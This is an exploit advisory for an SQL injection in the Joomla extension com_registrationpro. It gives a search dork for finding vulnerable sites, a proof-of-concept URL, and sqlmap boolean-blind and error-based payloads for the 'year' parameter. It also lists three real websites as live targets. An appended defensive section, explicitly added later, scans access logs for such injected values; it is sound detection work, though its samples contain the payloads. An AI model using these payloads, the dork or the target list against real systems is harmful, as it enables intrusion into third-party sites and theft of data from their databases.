Joomla com_registrationpro SQL injection Vulnerability

2016.08.11
xBADGIRL21 (MR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################
# Exploit Title : Joomla com_registrationpro SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_registrationpro
# Vendor Homepage : http://www.joomlashowroom.com/
# Version : 3.2.12 - 3.2.10
# Tested on : [ BACKBOX ]
# skype:xbadgirl21
# Date : 10/08/2016
# Video Proof : https://www.youtube.com/watch?v=GcEQMd7Dvl4
######################
# [+] DESCRIPTION :
######################
# [+] Event Registration Pro is a Joomla extension for accepting online registrations and payments for events,
# [+] training classes, conferences, and seminars.
# [+] An SQL injection has been detected in this Joomla component, registrationpro.
######################
# [+] PoC :
######################
# [year] GET parameter vulnerable to SQLi
# http://127.0.0.1/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021'
######################
# [+] SQLmap PoC:
######################
# Parameter: year (GET)
#     Type: boolean-based blind
#     Title: MySQL >= 5.0 boolean-based blind - Parameter replace
#     Payload: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=(SELECT (CASE WHEN (5274=5274) THEN 5274 ELSE 5274*(SELECT 5274 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
#
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
#     Payload: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 AND (SELECT 8657 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
# GET parameter 'year' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [!] Live Demo :
######################
http://www.k-noe.fr/achats/fr/registration/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
http://gallery7theatre.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
http://advancedbrain.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021
######################
# Solution
######################
# Just update to the latest version => Version #: [ 3.2.13 ]
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
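
A defender-side check for the pattern this advisory describes, as an added example that is not part of the original advisory or the vendor's code: it scans web-server access logs for com_registrationpro requests whose numeric calendar parameters carry non-digit characters. The log lines are constructed samples, and treating month, Itemid and listview as integer-only (beyond the year parameter the advisory names) is an assumption based on the URLs shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the advisory names only `year`; the other three are treated as
# integer-only because every URL in the advisory gives them plain integers.
NUMERIC_PARAMS = ("year", "month", "Itemid", "listview")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2016:10:00:01 +0000] "GET /index.php?option=com_registrationpro'
    '&view=calendar&Itemid=27&listview=2&month=6&year=2021 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Aug/2016:10:02:13 +0000] "GET /index.php?option=com_registrationpro'
    '&view=calendar&Itemid=27&listview=2&month=6&year=2021%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [11/Aug/2016:10:02:14 +0000] "GET /index.php?option=com_registrationpro'
    '&view=calendar&Itemid=27&listview=2&month=6&year=2021%20AND%201=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Aug/2016:10:05:00 +0000] "GET /index.php?option=com_content'
    '&view=archive&year=latest HTTP/1.1" 200 2048',
]

def suspicious_params(url):
    """Return {param: decoded value} for numeric calendar parameters holding non-digits."""
    query = parse_qs(urlsplit(url).query)  # also percent-decodes the values
    if "com_registrationpro" not in query.get("option", []):
        return {}  # other components are out of scope for this check
    return {name: value
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not DIGITS_RE.fullmatch(value)}

def scan_access_log(lines):
    """Return a list of (client_ip, findings) for every flagged request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the expected format
        findings = suspicious_params(match.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits

if __name__ == "__main__":
    for client, findings in scan_access_log(SAMPLE_LOG):
        print(client, findings)
```

The same digits-only rule, enforced server-side before the query is built, is the input-validation counterpart to upgrading to 3.2.13.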

References:

https://www.youtube.com/watch?v=GcEQMd7Dvl4



Copyright 2019, cxsecurity.com

 
